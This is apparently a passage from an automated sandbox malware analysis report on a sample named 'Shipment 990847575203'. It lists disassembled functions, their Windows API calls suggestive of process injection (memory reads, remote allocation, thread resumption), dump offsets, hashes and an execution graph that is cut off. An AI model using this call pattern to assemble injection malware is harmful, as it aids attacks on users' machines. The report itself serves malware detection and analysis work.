                                                                                                                              control_flow_graph 242 7c9e900-7c9e98d ReadProcessMemory 245 7c9e98f-7c9e995 242->245 246 7c9e996-7c9e9c6 242->246 245->246
                                                                                                                              APIs
                                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07C9E980
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2439607427.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7c90000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryProcessRead
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1726664587-0
                                                                                                                              • Opcode ID: 2da7615abacbca9aa0a38cac630bbb827019a20499c7dd9933174164473cc6d6
                                                                                                                              • Instruction ID: 2b838bf0244a4ed7c0bcf0a77a9a90f038ef85092a53812160addd4a19d13283
                                                                                                                              • Opcode Fuzzy Hash: 2da7615abacbca9aa0a38cac630bbb827019a20499c7dd9933174164473cc6d6
                                                                                                                              • Instruction Fuzzy Hash: CA2125B1C003599FDB10DFAAC885AEEFBF5FF48320F10842AE558A7250C7399940CBA4
                                                                                                                              Function 0185D588 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 250 185d588-185d61c DuplicateHandle 252 185d625-185d642 250->252 253 185d61e-185d624 250->253 253->252
                                                                                                                              APIs
                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0185D60F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2420449332.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1850000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DuplicateHandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3793708945-0
                                                                                                                              • Opcode ID: 8511a097db119acdf547322630ae95302dc6e1257608efef0dce2ed055d97193
                                                                                                                              • Instruction ID: dd48c88692ab2a144d492293156eb5d039419f8b35f8b49639994d67b165211c
                                                                                                                              • Opcode Fuzzy Hash: 8511a097db119acdf547322630ae95302dc6e1257608efef0dce2ed055d97193
                                                                                                                              • Instruction Fuzzy Hash: 7921C4B5900249DFDB10CF9AD984ADEBBF5EB48320F14841AE918A7350D378A954CFA5
                                                                                                                              Function 07CA1254 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 256 7ca1254-7ca3534 CreateIconFromResourceEx 258 7ca353d-7ca355a 256->258 259 7ca3536-7ca353c 256->259 259->258
                                                                                                                              APIs
                                                                                                                              • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,07CA3482,?,?,?,?,?), ref: 07CA3527
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2439663321.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ca0000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFromIconResource
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3668623891-0
                                                                                                                              • Opcode ID: b923929b038e59efb5ae7313b628e86b41fa4c9249a0209326dd8cc18328816e
                                                                                                                              • Instruction ID: 2b30f3b88994a8b23e7e8ff73b58be8a9917958513e0b27c7c554193a1a6787a
                                                                                                                              • Opcode Fuzzy Hash: b923929b038e59efb5ae7313b628e86b41fa4c9249a0209326dd8cc18328816e
                                                                                                                              • Instruction Fuzzy Hash: A61117B1800359AFDB10DF9AD844ADEBFF8EB48324F14841AE914A7250C379A954CFA4
                                                                                                                              Function 07C9E750 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 262 7c9e750-7c9e7cb VirtualAllocEx 265 7c9e7cd-7c9e7d3 262->265 266 7c9e7d4-7c9e7f9 262->266 265->266
                                                                                                                              APIs
                                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07C9E7BE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2439607427.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7c90000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4275171209-0
                                                                                                                              • Opcode ID: b95ed7b6ec80e5b9eab380b14fd7f2290f2b49a741b39315084191970d2f56dd
                                                                                                                              • Instruction ID: f986b4e3441ceabe489c16301c7453593510e7437e37a79f57243d4ab910e7c3
                                                                                                                              • Opcode Fuzzy Hash: b95ed7b6ec80e5b9eab380b14fd7f2290f2b49a741b39315084191970d2f56dd
                                                                                                                              • Instruction Fuzzy Hash: 351126728002499FDB10DFAAC845BDEBBF5EF88720F248819E519A7250C7759550CBA5
                                                                                                                              Function 07CA34B7 Relevance: 1.6, APIs: 1, Instructions: 51windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,07CA3482,?,?,?,?,?), ref: 07CA3527
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2439663321.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ca0000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFromIconResource
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3668623891-0
                                                                                                                              • Opcode ID: 5144b10124e5cf51ac7092bd8c215b6b2bb55be83bc9a05cda63da96816ae3bd
                                                                                                                              • Instruction ID: 514ee1e38366321549d885388de7228f81b71ecdf46d5ce86fe83642649d9d50
                                                                                                                              • Opcode Fuzzy Hash: 5144b10124e5cf51ac7092bd8c215b6b2bb55be83bc9a05cda63da96816ae3bd
                                                                                                                              • Instruction Fuzzy Hash: 0F1116B680025ADFDB10CFA9D944BDEBFF8EF48324F14841AE558A7250C339A954DFA4
                                                                                                                              Function 07C9E190 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2439607427.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7c90000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ResumeThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 947044025-0
                                                                                                                              • Opcode ID: 87bd594bd725c3f99db9e68289e34c02a0b6a1d7f2331e2eeff7bbbc44df0bdb
                                                                                                                              • Instruction ID: 3b47852968c2711c004a0c368bb2fa706a21dd09455c86f7c237181e5456c8ca
                                                                                                                              • Opcode Fuzzy Hash: 87bd594bd725c3f99db9e68289e34c02a0b6a1d7f2331e2eeff7bbbc44df0bdb
                                                                                                                              • Instruction Fuzzy Hash: 7F1128B1D003498FEB14DFAAC4457DEFBF4EB88624F248419D519A7240C779A540CB94
                                                                                                                              Function 0185B298 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0185B2FE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2420449332.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1850000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4139908857-0
                                                                                                                              • Opcode ID: 77115a7bb9819e27028adde9bfe940dc51737bb06ba07976345833a60093f16e
                                                                                                                              • Instruction ID: 602035146a6eaf9c43ffce2a81e72b1089f98eee29bb6cc690b31958cc591179
                                                                                                                              • Opcode Fuzzy Hash: 77115a7bb9819e27028adde9bfe940dc51737bb06ba07976345833a60093f16e
                                                                                                                              • Instruction Fuzzy Hash: 431110B5C002498FDB10CF9AC444ADEFBF5EF88324F10841AD919B7210C379A645CFA5
                                                                                                                              Function 07ED28C8 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • PostMessageW.USER32(?,?,?,?), ref: 07ED2925
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2440343413.0000000007ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07ED0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ed0000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePost
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 410705778-0
                                                                                                                              • Opcode ID: 10004de4b88f7ad7df343c910c3705631206faaac7da2874a0340db0a2107351
                                                                                                                              • Instruction ID: dca2c1f03347021a9285e3fa48323b5b5f8ae8977bab47860a0677a45226b5e8
                                                                                                                              • Opcode Fuzzy Hash: 10004de4b88f7ad7df343c910c3705631206faaac7da2874a0340db0a2107351
                                                                                                                              • Instruction Fuzzy Hash: 191103B58003499FDB10CF9AC445BDEBBF8FB48324F208419E558A7200C375A944CFA1
                                                                                                                              Function 07ED28C1 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • PostMessageW.USER32(?,?,?,?), ref: 07ED2925
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2440343413.0000000007ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07ED0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ed0000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePost
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 410705778-0
                                                                                                                              • Opcode ID: 39546fc57cc938d2a93d2b7575cdd6f4d6ce3a1f261795c3efe577aa004ea38e
                                                                                                                              • Instruction ID: 7425d8b68c9770bcc1126fcb1c04fec83a3d23a4fe8ebd4d7c09ae07f5e2eb06
                                                                                                                              • Opcode Fuzzy Hash: 39546fc57cc938d2a93d2b7575cdd6f4d6ce3a1f261795c3efe577aa004ea38e
                                                                                                                              • Instruction Fuzzy Hash: 2411C2B5800249DFDB10CF99D545BDEBBF8EB48324F24841AD558B7650C379A984CFA1
                                                                                                                              Function 0155D1FC Relevance: .1, Instructions: 76COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2419674216.000000000155D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0155D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_155d000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 91e48ce35ec61cdd97e36327e827ce25998084af7a33b97ba8751889cbca7078
                                                                                                                              • Instruction ID: ea3703f184cc71fcd67d1667d94f345cb31f05313b422618778e90e5ba50a576
                                                                                                                              • Opcode Fuzzy Hash: 91e48ce35ec61cdd97e36327e827ce25998084af7a33b97ba8751889cbca7078
                                                                                                                              • Instruction Fuzzy Hash: 4B21F172504200DFDB45DF94D9D0B2ABBB5FB88320F20C56AED094E246C336D456CBA1
                                                                                                                              Function 0155D4C4 Relevance: .1, Instructions: 75COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2419674216.000000000155D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0155D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_155d000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f72b9261b8188dd1229c70629eaa7a5422a4def9b6f98996d7731b4fc9d9377d
                                                                                                                              • Instruction ID: 1bcea9f674db570e9c9dfa1dd41cf000ead6983b4d89a40117e353f068da1705
                                                                                                                              • Opcode Fuzzy Hash: f72b9261b8188dd1229c70629eaa7a5422a4def9b6f98996d7731b4fc9d9377d
                                                                                                                              • Instruction Fuzzy Hash: 1121FF72500244EFDB45DF98D9D0B2ABFB5FB88318F20C56AED090E256C336D456CAA2
                                                                                                                              Function 0156D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2419718401.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_156d000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c7661642c7ff707b869145c6d1a0902d3a3b26cf52c0eaa875587f30b817de24
                                                                                                                              • Instruction ID: 3cacfb39167015baf1ff360dbe90f869a0c7a1ed51321498b0204e95c55c77b0
                                                                                                                              • Opcode Fuzzy Hash: c7661642c7ff707b869145c6d1a0902d3a3b26cf52c0eaa875587f30b817de24
                                                                                                                              • Instruction Fuzzy Hash: CF210771604204EFDB05DF94D5C0B2ABBB9FB84324F24CD6DD9894F252C37AD446CAA1
                                                                                                                              Function 0156D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2419718401.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_156d000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 15d2eb6cfb070846b408d0d65a160b49ca074525f9e0daa02dc5c08c16bfc0f6
                                                                                                                              • Instruction ID: e44de761b2fda7af4d9e26478610c3ea60116f9c383f0566151cf328a5f64358
                                                                                                                              • Opcode Fuzzy Hash: 15d2eb6cfb070846b408d0d65a160b49ca074525f9e0daa02dc5c08c16bfc0f6
                                                                                                                              • Instruction Fuzzy Hash: 10210375604204DFDB15DF54D580B26BBB9FB84324F20C96DD9894F242D33BD447CAA1
                                                                                                                              Function 0156D006 Relevance: .1, Instructions: 62COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2419718401.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_156d000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 38e057fbfc7b242e1be9b60fda4270aa9b9844c8e4b5bcd4db2cda6a5b36fc21
                                                                                                                              • Instruction ID: 40e8e012057f90e05374850a02e86d97573f92eddde3ff9549dcdcb78603a152
                                                                                                                              • Opcode Fuzzy Hash: 38e057fbfc7b242e1be9b60fda4270aa9b9844c8e4b5bcd4db2cda6a5b36fc21
                                                                                                                              • Instruction Fuzzy Hash: 982183755093808FC702CF24D590715BF71FB46214F28C5DAD8898F267C33A980ACBA2
                                                                                                                              Function 0155D1F7 Relevance: .1, Instructions: 57COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2419674216.000000000155D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0155D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_155d000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 97b80ae79017b4ed6bea6dd9b7a80ca74a39b088e4df1c4c2e3fdfc2e958b63e
                                                                                                                              • Instruction ID: 429ee91751f2b0e4913500e57af1bd22ddeb5160878dcdd974ba49ba1c69e467
                                                                                                                              • Opcode Fuzzy Hash: 97b80ae79017b4ed6bea6dd9b7a80ca74a39b088e4df1c4c2e3fdfc2e958b63e
                                                                                                                              • Instruction Fuzzy Hash: F321CD76404240CFDB06CF44D9C4B1ABF72FB84324F24C1AADC080E656C33AD426CBA1
                                                                                                                              Function 0155D4BF Relevance: .1, Instructions: 56COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2419674216.000000000155D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0155D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_155d000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
                                                                                                                              • Instruction ID: 59737515d79a1182c030f9152d85bb7d00f1e1b1a3c2a6019f9494507edb880b
                                                                                                                              • Opcode Fuzzy Hash: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
                                                                                                                              • Instruction Fuzzy Hash: 9E119D76504284CFCB16CF54D5D4B1ABF71FB84218F2486AADC490F656C33AD45ACBA1
                                                                                                                              Function 0156D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2419718401.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_156d000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f5dd070f47a673dda7babee824c8441981cc2d376d27ad6ac8e2bf7ef2f1688d
                                                                                                                              • Instruction ID: d2f143ceb23925da3b5d7232c86c5dabdc7818bbfadb298eaa6846113e566db7
                                                                                                                              • Opcode Fuzzy Hash: f5dd070f47a673dda7babee824c8441981cc2d376d27ad6ac8e2bf7ef2f1688d
                                                                                                                              • Instruction Fuzzy Hash: 2911BB75604280DFCB12CF54C5C0B19BBB1FB84224F28CAA9D8894F296C33AD44ACBA1
                                                                                                                              Function 0155D745 Relevance: .0, Instructions: 45COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2419674216.000000000155D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0155D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_155d000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5daf1bf3d2ce6403a43275aca6baa46448186d5d5d0dea65c78348680e7c75ff
                                                                                                                              • Instruction ID: 2028b4fb5a9af96f82871194fa42264fb97d12dd9a70a745222f4a83379d6a8f
                                                                                                                              • Opcode Fuzzy Hash: 5daf1bf3d2ce6403a43275aca6baa46448186d5d5d0dea65c78348680e7c75ff
                                                                                                                              • Instruction Fuzzy Hash: A201F7320143849AF7608AA9CD94B6BBFE8FF41224F18851BEE084E682D2399441C6B1
                                                                                                                              Function 0155D744 Relevance: .0, Instructions: 36COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2419674216.000000000155D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0155D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_155d000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e429b53ca883a0dbeaa2907227ae90832e90d2985cd5f565b09e4af5c434a23e
                                                                                                                              • Instruction ID: d1c880a7d5b90116c1f7ff2a84f6c5cdc6d0f1a906b82dd70e922eab99db4ec8
                                                                                                                              • Opcode Fuzzy Hash: e429b53ca883a0dbeaa2907227ae90832e90d2985cd5f565b09e4af5c434a23e
                                                                                                                              • Instruction Fuzzy Hash: 79F062724053849AF7118E59D884B66FFA8FB81634F18C45AED084F686C2799844CAB1

                                                                                                                              Non-executed Functions

                                                                                                                              Function 07C9D488 Relevance: .3, Instructions: 312COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2439607427.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7c90000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 87365218f32019ede6454949ff701c4d3af3d5ee8b3961560d905180d8f645b1
                                                                                                                              • Instruction ID: f854de12e7b05577aed2ecade87e0bc8cdb17ae6a8344b6c0af2ef952873392f
                                                                                                                              • Opcode Fuzzy Hash: 87365218f32019ede6454949ff701c4d3af3d5ee8b3961560d905180d8f645b1
                                                                                                                              • Instruction Fuzzy Hash: 44E1E9B4E002598FDB14DFA9C584AAEFBF2FF89305F248169D415AB356D730A942CF60
                                                                                                                              Function 07C9E240 Relevance: .3, Instructions: 312COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2439607427.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7c90000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8c8eb144b0a87b8684dcdd32f836eca844d530f59d875955375387712f251383
                                                                                                                              • Instruction ID: e747b962b54f6dd02cd84d9d77444de0be484f0c9d431688203920dc09325a12
                                                                                                                              • Opcode Fuzzy Hash: 8c8eb144b0a87b8684dcdd32f836eca844d530f59d875955375387712f251383
                                                                                                                              • Instruction Fuzzy Hash: 28E1E7B5E002599FDB14CFA9C5849AEBBF2FF89305F248169D418AB356D730AD42CF60
                                                                                                                              Function 07C9C198 Relevance: .3, Instructions: 312COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2439607427.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7c90000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5d251832b713e2fa5658803bd4799d1618125e8ec7540d0aad6739914272ea8e
                                                                                                                              • Instruction ID: 9006add590709d8035a3c71ea8b1a4c06ff732976cfbab05e5171e2e69eab1ac
                                                                                                                              • Opcode Fuzzy Hash: 5d251832b713e2fa5658803bd4799d1618125e8ec7540d0aad6739914272ea8e
                                                                                                                              • Instruction Fuzzy Hash: 2EE1D8B4E002599FDB64CFA9C5849AEBBF2FF89305F248169D414AB356D730AD41CF60
                                                                                                                              Function 07C9D8C0 Relevance: .3, Instructions: 312COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2439607427.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7c90000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 225b778b47c73ffc2cee8a6b3171ff2e0c4cd1348a53a0d9ae0be107fb3b1b18
                                                                                                                              • Instruction ID: 501db2352b0a87b152fc93295c09d9352355d286d7aa9141e84496c94642f2eb
                                                                                                                              • Opcode Fuzzy Hash: 225b778b47c73ffc2cee8a6b3171ff2e0c4cd1348a53a0d9ae0be107fb3b1b18
                                                                                                                              • Instruction Fuzzy Hash: C9E1E8B4E002598FDB14DFA9C584AAEBBF2FF89305F248169D415AB356D730A942CF60
                                                                                                                              Function 0185DE84 Relevance: .3, Instructions: 264COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2420449332.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1850000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f1f0d30f5685a59c7346b10f73d8d7c9b20f9df7432723c9b0aa1422755c09f5
                                                                                                                              • Instruction ID: 69a76ccff91677e36c12caf1c68d151b3efb40dba5708cae8c57b016a0a71140
                                                                                                                              • Opcode Fuzzy Hash: f1f0d30f5685a59c7346b10f73d8d7c9b20f9df7432723c9b0aa1422755c09f5
                                                                                                                              • Instruction Fuzzy Hash: C1A14E32A0021ACFCF05DFB9D84459EBBB2FF84304B15856AED06EB265DB71EA55CB40

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:15.3%
                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                              Signature Coverage:0%
                                                                                                                              Total number of Nodes:159
                                                                                                                              Total number of Limit Nodes:12
                                                                                                                              execution_graph 21259 a95488 21261 a954b9 21259->21261 21263 a955b9 21259->21263 21260 a954c5 21261->21260 21268 a956f0 21261->21268 21272 a95700 21261->21272 21262 a95505 21276 a969f0 21262->21276 21285 a96a00 21262->21285 21294 a95740 21268->21294 21304 a95750 21268->21304 21269 a9570a 21269->21262 21273 a9570a 21272->21273 21274 a95740 2 API calls 21272->21274 21275 a95750 2 API calls 21272->21275 21273->21262 21274->21273 21275->21273 21277 a96a00 21276->21277 21325 a96f50 21277->21325 21278 a96aae 21279 a94c14 GetModuleHandleW 21278->21279 21281 a96ada 21278->21281 21280 a96b1e 21279->21280 21283 a978e0 CreateWindowExW 21280->21283 21284 a978d0 CreateWindowExW 21280->21284 21283->21281 21284->21281 21286 a96a2b 21285->21286 21291 a96f50 GetModuleHandleW 21286->21291 21287 a96aae 21288 a94c14 GetModuleHandleW 21287->21288 21290 a96ada 21287->21290 21289 a96b1e 21288->21289 21350 a978e0 21289->21350 21353 a978d0 21289->21353 21291->21287 21295 a95750 21294->21295 21298 a95784 21295->21298 21314 a94c14 21295->21314 21298->21269 21299 a9577c 21299->21298 21300 a95988 GetModuleHandleW 21299->21300 21301 a959b5 21300->21301 21301->21269 21305 a95761 21304->21305 21308 a95784 21304->21308 21306 a94c14 GetModuleHandleW 21305->21306 21307 a9576c 21306->21307 21307->21308 21312 a959e8 GetModuleHandleW 21307->21312 21313 a959d8 GetModuleHandleW 21307->21313 21308->21269 21309 a9577c 21309->21308 21310 a95988 GetModuleHandleW 21309->21310 21311 a959b5 21310->21311 21311->21269 21312->21309 21313->21309 21315 a95940 GetModuleHandleW 21314->21315 21317 a9576c 21315->21317 21317->21298 21318 a959d8 21317->21318 21322 a959e8 21317->21322 21319 a959e8 21318->21319 21320 a94c14 GetModuleHandleW 21319->21320 21321 a959fc 21320->21321 21321->21299 21323 a94c14 GetModuleHandleW 21322->21323 21324 a959fc 21323->21324 21324->21299 21326 a96f8d 21325->21326 21327 a9700e 21326->21327 21330 a970c1 21326->21330 21340 a970d0 21326->21340 21331 a970e5 21330->21331 21332 a94c14 GetModuleHandleW 21331->21332 21333 a97109 21331->21333 21332->21333 21334 a94c14 